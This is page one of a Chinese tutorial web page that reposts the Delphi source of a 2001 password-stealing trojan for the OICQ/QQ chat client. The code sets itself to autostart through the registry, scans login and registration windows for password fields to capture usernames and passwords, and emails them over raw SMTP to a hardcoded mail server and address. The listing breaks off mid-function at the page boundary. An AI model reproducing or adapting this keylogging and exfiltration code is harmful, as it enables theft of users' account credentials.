OICQ 远程木马的设计技术_Delphi程序_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

OICQ 远程木马的设计技术

作者：闵涛文章来源：闵涛的学习笔记点击数：1667 更新时间：2009/4/23 18:44:20

{
****************** OICQ Hack 2001***********
*
* 2001 5.22 ver 1.1 Modify for OICQ2000b 0230
* 2001 5.25 ver 1.2 Modify for QQ2000b 0430
* Last updated: 2001.5.25
* Author :njhhack
* HackSoft Research Lab.
* Copyright(C) 2001 Allrigths Reserved.
*
*
**********************************************
}

//---------------下面是oicqhack.dpr工程文件
program oicqhack;

uses
Windows,
Messages,
mainunit in ''''mainunit.pas'''';

{$R *.RES}

var
wClass: TWndClass; // class struct for main window
Msg: TMSG; // message struct

procedure ShutDown;
begin
UnRegisterClass(classname,hInst);
ExitProcess(hInst); //end program
end;

function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall;
begin
Result:=DefWindowProc(hWnd,Msg,wParam,lParam);
case Msg of
WM_CREATE: wincreate;
WM_TIMER: ontimer1;
WM_DESTROY: ShutDown;
end;
end;

begin
//如果旧版本已运行,则停止旧版程序,只运行当前新版程序
hmain:=Findwindow(''''HackSoft-Oicq-Password-Recoder'''',''''OICQ 密码记录器2'''');
if hmain<>0 then sendmessage(lp,wm_destroy,0,0);

hInst:=GetModuleHandle(nil); // get the application instance
classname:=''''HackSoft-Oicq-Password-Recoder'''';
with wClass do
begin
Style:= CS_PARENTDC;
hIcon:= LoadIcon(hInst,''''MAINICON'''');
lpfnWndProc:= @WindowProc;
hInstance:= hInst;
hbrBackground:= COLOR_BTNFACE+1;
lpszClassName:= classname;
hCursor:= LoadCursor(0,IDC_ARROW);
end;
RegisterClass(wClass);
hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,''''OICQ 密码记录器3'''',WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil);
//建立一个新的定时器，用来定时扫描系统中的窗口
newtime:=SetTimer(hmain,0,300,nil);
//建立消息循环
while(GetMessage(Msg,hmain,0,0))do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
//结束定时器
killtimer(hmain,newtime);
end.

//-------下面是mainunit.pas单元文件

unit mainunit;

interface

uses
Windows,
Messages,
SysUtils,
Classes,
winsock,
registry;
const
CRLF=#13#10;
var
spy:string;
hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer;
his:array[0..100] of integer;
syspath:array[0..200] of integer;
regservice:function(uThread:integer;uType:integer):Integer;stdcall;
libhandle:thandle;
classname:array[0..100] of char;
items:array[0..4] of string;

err:integer;
wsadata:twsadata;
fsocket,fport,step:integer;
SockAddrIn:TSockAddrIn;
hackmail,email,newpass,fhost,s1,password:string;
sbuf:array[0..1024] of char;

procedure winCreate;
procedure OnTimer1;

implementation

//修改注册表让程序自启动
procedure autorun;
var reg:tregistry;
begin
reg:=tregistry.create;
reg.rootkey:=HKEY_LOCAL_MACHINE;
reg.openkey(''''SOFTWARE\Microsoft\Windows\CurrentVersion\Run'''',true);
reg.WriteString(''''oicqpass'''',spy+''''OICQPASS.EXE'''');
reg.closekey;
reg.free;
end;

//下面是个发信的子过程,取得密码后发回getoicq@21cn.com邮箱
procedure MailSend;
begin
err:=recv(FSocket,sbuf,400,0);
s1:=strpas(sbuf);
inc(step);
case step of
1:s1:=''''HELO smtp.hacker.com''''+CRLF;
2:s1:=''''MAIL FROM: <getoicq@21cn.com>''''+CRLF;
3:s1:=''''RCPT TO: <''''+email+''''>''''+CRLF;
4:s1:=''''DATA''''+CRLF;
5:s1:=''''From:"Oicq Hack"<www.hacker.com>''''+CRLF
+''''To:"getoicq"<www.password.com>''''+CRLF
+''''Subject:QQ2001 Password come.''''+CRLF
+CRLF
+newpass+CRLF
+''''.''''+CRLF;
6:s1:=''''QUIT''''+CRLF;
else
step:=0;
end;
strcopy(sbuf,pchar(s1));
err:=send(FSocket,sbuf,strlen(sbuf),MSG_DONTROUTE);
end;
//发信主过程
procedure SendPass;
begin
err:=WSAStartup($0101,WSAData);
FSocket := socket(PF_INET, SOCK_STREAM,IPPROTO_IP);
//利用 smtp.21cn.com 进行发信
fhost:=''''202.104.32.230'''';
fport:=25;
SockAddrIn.sin_addr.s_addr:=inet_addr(PChar(FHost));
SockAddrIn.sin_family := PF_INET;
SockAddrIn.sin_port :=htons(Fport);
err:=connect(FSocket,SockAddrIn, SizeOf(SockAddrIn));
step:=0;
repeat
MailSend;
until step=0;
err:=closesocket(FSocket);
err:=WSACleanup;
end;

//窗口枚举函数
function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall;
var hw,hwold,hs,wlong,hup,i:integer;
sbuf,sb3,sb2:array[0..256] of char;
sb1:string;
begin
hwold:=GetParent(hwnd);
wlong:=GetWindowLong(hwnd,GWL_STYLE);
if (wlong and ES_PASSWORD)<>0 then
begin
//检查是否OICQ登陆
hup:=GetParent(hwnd);
sendmessage(hup,wm_gettext,100,integer(@sbuf));
strpcopy(sb2,''''OICQ 注册向导'''');
strpcopy(sb3,''''QQ 注册向导'''');
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
old:=GetParent(hup);
old:=GetParent(old);
old:=GetParent(old);
start:=0;
count:=1;
//items.clear;

//跳过两个窗口
hwnd:=Getwindow(hwnd,GW_HWNDFIRST);
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
//取得用户名
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[0]:=''''用户名:''''+strpas(sbuf);
//取得密码
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[1]:=''''密码:''''+strpas(sbuf);
end;
strpcopy(sb2,''''OICQ用户登录'''');
strpcopy(sb3,''''QQ用户登录'''');
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
old:=GetParent(hup);
old:=GetParent(old);
start:=0;
count:=1;
//items.clear;
//取得用户名
hwnd:=Getwindow(hwnd,GW_HWNDFIRST);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[0]:=''''用户名:''''+strpas(sbuf);
//取得密码
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[1]:=''''密码:''''+strpas(sbuf);
end;
end;
//检查是否在线
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
strpcopy(sb2,''''在线'''');
strpcopy(sb3,'

[1] [2] 下一页

[聊天工具]OICQ 2000武器篇  [聊天工具]OICQ 2000大法
[Delphi程序]用DELPHI给OICQ动手术(二)  [Delphi程序]用DELPHI给OICQ动手术(一)
[网络应用]oicq的攻与防小全

教程录入：mintao 责任编辑：mintao

上一篇教程： win32下的系统日志钩子示例程序(Delphi 版)

下一篇教程： Delphi中Hook技术全接触

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· C语言系列 · VB.NET程序
· JAVA开发 · Delphi程序
· 脚本语言

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……